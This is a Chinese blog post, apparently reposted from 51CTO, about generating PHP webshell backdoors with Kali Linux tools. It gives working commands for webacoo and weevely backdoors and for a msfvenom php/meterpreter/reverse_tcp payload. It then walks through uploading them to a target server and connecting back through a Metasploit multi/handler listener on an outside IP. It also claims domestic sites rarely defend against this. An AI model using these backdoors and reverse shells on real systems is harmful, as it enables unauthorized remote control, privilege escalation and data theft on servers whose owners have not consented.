kali下生成web端后门

简介:

  很多时候在渗透测试时选择web木马害怕用的别人的马带有后门,这样自己的辛苦就要被别人不劳而获,很多时候我们都想拥有自己的马,那么这个时候你就应该使用kail来生成一个自己独特密码的web木马了。

 Kali Linux自带有好几个web木马生成工具,下面我们来简单看几个:


1.webacoo后门

webacoo  -g -o test.php

-g 制作后门代码

-o 输出生成指定的后门程序文件名

wKioL1Zli82gQMVfAAAu6riv1A0061.png

把web后门上传到目标服务器后

使用kali linux访问如下

webacoo -t -u http://www.xx.com/test.php

注意:上传的路径一定要正确

最后退出的时候使用exit退出



2.weevely

查看帮助信息

wKioL1Zli8-BvBjMAAAk1biLZUM186.png


生成后门

下列命令可以生产混搅PHP backdoor , 密码password 后门名字disaplay.php


weevely generate password disaplay.php


wKioL1Zli9CTIbX0AAAzLMyt8MA048.png


把后门文件上传到服务器后,如下命令可以成功访问

weevely http://www.xxx.com/disaplay.php password

通过help看到weevely有很多的module

.net.ifaces 查看服务器的端口信息

.net.scan 202.205.xx.xx 22   对服务器某个端口扫描



3.PHP Meterpreter

metasploit有一个名为PHP Meterpreter的payload,可创建具有meterpreter功能的PHP webshell。

Metasploit的msfvenom工具可以制作PHP Meterpreter,命令如下:

msfvenom  -p  php/meterpreter/reverse_tcp LHOST=自己监听的IP -f raw > php_meter.php

-p 设置payload

-f 设置输出文件格式

wKioL1Zli8-QE6pRAAAcwP6E-4M289.png


wKiom1Zli2DRN9KlAAAl3u1nWKs170.png


但是使用前需要注意生成文件的第一行被注释了,所以需要把注释去掉才能使用

把webshell上传到目标服务器,本地监听打开如下:

启动msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 202.205.7.162


wKiom1Zli1_xIK6FAAAtU0mx_E0849.png


然后我们就可以使用kali的metasploit功能对目标服务器进行一系列操作。



这种WEBSHELL 利用起来相当方便,输入shell命令之后,就可以随便提权什么的了.
1,国内的貌似没有防护这块的,国内大多只防护GET POST COOKIE这些数据.
2,缺点是如果服务器在DMZ,则失效.
3,more what .....   这种shell如果被利用多了,肯定会有硬件厂商去做防护的.




     本文转自Tar0 51CTO博客,原文链接:http://blog.51cto.com/tar0cissp/1720542,如需转载请自行联系原作者



相关文章
|
2月前
|
安全 Linux Shell
Kali渗透测试:使用Metasploit对Web应用的攻击
Kali渗透测试:使用Metasploit对Web应用的攻击
159 4
|
2月前
|
安全 Java Linux
Kali渗透测试:通过Web应用程序实现远程控制
Kali渗透测试:通过Web应用程序实现远程控制
54 0
|
Ubuntu 网络安全 Apache
物理机不能访问虚拟机kali的web服务解决方案记录
物理机不能访问虚拟机kali的web服务解决方案记录
463 0
|
安全 Perl 开发工具
kali下扫描CMS web漏洞小工具web-sorrow
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396564 ...
1963 0
|
Web App开发 安全 Linux
Kali Linux Web 渗透测试秘籍 第一章 配置 Kali Linux
第一章 配置 Kali Linux 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 在第一章中,我们会涉及如何准备我们的 Kali 以便能够遵循这本书中的秘籍,并使用虚拟机建立带有存在漏洞的 Web 应用的实验室。
2840 0
|
Web App开发 数据采集 测试技术
Kali Linux Web 渗透测试秘籍 第三章 爬虫和蜘蛛
第三章 爬虫和蜘蛛 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 渗透测试可以通过多种途径完成,例如黑盒、灰盒和白盒。
1865 0
|
Web App开发 测试技术 Linux
Kali Linux Web 渗透测试秘籍 第九章 客户端攻击和社会工程
第九章 客户端攻击和社会工程 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 我们目前所见的大部分技巧都尝试利用服务端的漏洞或设计缺陷,并访问它来从数据库中提取信息。
1444 0
|
Web App开发 安全 测试技术
Kali Linux Web 渗透测试秘籍 第五章 自动化扫描
第五章 自动化扫描 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 几乎每个渗透测试项目都需要遵循严格的日程,多数由客户的需求或开发交谈日期决定。
1638 0
|
Web App开发 网络协议 测试技术
Kali Linux Web 渗透测试秘籍 第八章 中间人攻击
第八章 中间人攻击 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 中间人(MITM)攻击是一种攻击类型,其中攻击者将它自己放到两方之间,通常是客户端和服务端通信线路的中间。
1925 0
|
SQL Web App开发 安全
Kali Linux Web 渗透测试秘籍 第四章 漏洞发现
第四章 漏洞发现 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 我们现在已经完成了渗透测试的侦查阶段,并且识别了应用所使用的服务器和开发框架的类型,以及一些可能的弱点。
1370 0